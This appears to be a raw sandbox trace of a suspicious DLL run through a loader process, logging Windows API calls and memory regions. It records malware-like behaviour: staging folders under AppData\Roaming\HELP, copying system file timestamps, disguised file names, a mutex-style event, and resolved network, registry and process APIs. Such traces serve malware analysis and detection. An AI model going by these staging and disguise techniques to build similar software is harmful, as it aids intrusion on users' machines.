GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.082] GetLastError () returned 0x0 [0031.082] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.083] SetLastError (dwErrCode=0x0) [0031.083] GetLastError () returned 0x0 [0031.084] SetLastError (dwErrCode=0x0) [0031.084] GetLastError () returned 0x0 [0031.084] SetLastError (dwErrCode=0x0) [0031.084] GetLastError () returned 0x0 [0031.084] SetLastError (dwErrCode=0x0) [0031.084] GetLastError () returned 0x0 [0031.084] SetLastError (dwErrCode=0x0) [0031.084] GetLastError () returned 0x0 [0031.084] SetLastError (dwErrCode=0x0) [0031.084] GetLastError () returned 0x0 [0031.084] SetLastError (dwErrCode=0x0) [0031.084] GetLastError () returned 0x0 [0031.084] SetLastError (dwErrCode=0x0) [0031.084] GetLastError () returned 0x0 [0031.084] SetLastError (dwErrCode=0x0) [0031.085] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.085] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.085] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.086] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f6a0 | out: lpSystemTimeAsFileTime=0x22f6a0*(dwLowDateTime=0xe03fc0f0, dwHighDateTime=0x1d3dfba)) [0031.093] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f5d8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.093] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f4c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetLastError () returned 0x0 [0031.093] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.093] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.094] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.094] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.094] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.094] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.094] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.094] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.094] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.094] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.094] GetLastError () returned 0xb7 [0031.094] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.094] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.094] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.094] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.094] wsprintfA (in: param_1=0x22f340, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.094] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.094] wsprintfA (in: param_1=0x22f23c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.094] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.094] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.094] CloseHandle (hObject=0x74) returned 1 [0031.095] GetLastError () returned 0x0 [0031.095] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.095] GetLastError () returned 0x0 [0031.095] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.095] GetSystemDirectoryA (in: lpBuffer=0x22f340, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.095] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.095] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.095] CloseHandle (hObject=0x74) returned 1 [0031.095] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.095] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.095] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.097] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.097] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.097] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.097] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.097] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.097] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.097] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0031.097] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.097] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.097] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.097] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.097] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.097] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.097] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.098] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.099] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.099] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.099] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.099] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.099] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.099] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.099] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.099] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.099] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.099] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.099] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.099] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.099] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.099] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.099] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.099] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.099] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.099] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.099] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.100] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.100] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.100] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.100] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.100] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.100] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.100] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.100] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.100] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.100] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.100] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.100] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.100] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x0 [0031.100] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName="97ryuhf023") returned 0x74 [0031.100] CreateFileMappingA (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x104, lpName="c745%") returned 0x78 [0031.100] MapViewOfFile (hFileMappingObject=0x78, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xd0000 [0031.100] GetLastError () returned 0x0 [0031.100] SetLastError (dwErrCode=0x0) [0031.100] CreateFileMappingA (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4, lpName="fjg48394") returned 0x7c [0031.100] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xe0000 [0031.101] GetLastError () returned 0x0 [0031.101] SetLastError (dwErrCode=0x0) [0031.101] GetLastError () returned 0x0 [0031.101] SetLastError (dwErrCode=0x0) [0031.101] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.101] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.101] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.101] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x72efff7e, lpParameter=0x8b26d8, dwCreationFlags=0x4, lpThreadId=0x8b26d8 | out: lpThreadId=0x8b26d8*=0xaa8) returned 0x80 [0031.101] ResumeThread (hThread=0x80) returned 0x1 [0031.103] HeapDestroy (hHeap=0x8b0000) returned 1 Thread: id = 20 os_tid = 0xaa8 Process: id = "7" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f740" os_pid = "0xa9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 437 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 438 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 439 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 440 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 441 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 442 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 443 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 444 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 445 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 446 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 447 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 448 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 449 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 450 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 451 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 452 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 453 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 454 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 455 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 456 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 457 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 458 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 459 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 460 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 461 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 462 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 463 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 464 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 465 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 466 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 467 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 468 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 469 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 470 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 471 start_va = 0x72dd0000 end_va = 0x72e14fff entry_point = 0x72dd0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 472 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 473 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 474 start_va = 0x4f0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 475 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 476 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 477 start_va = 0x660000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Thread: id = 18 os_tid = 0xaa0 [0031.145] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f4f4 | out: lpSystemTimeAsFileTime=0x28f4f4*(dwLowDateTime=0xe0494670, dwHighDateTime=0x1d3dfba)) [0031.145] GetCurrentProcessId () returned 0xa9c [0031.145] GetCurrentThreadId () returned 0xaa0 [0031.145] GetTickCount () returned 0x16f36 [0031.145] QueryPerformanceCounter (in: lpPerformanceCount=0x28f4ec | out: lpPerformanceCount=0x28f4ec*=359271577) returned 1 [0031.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.146] 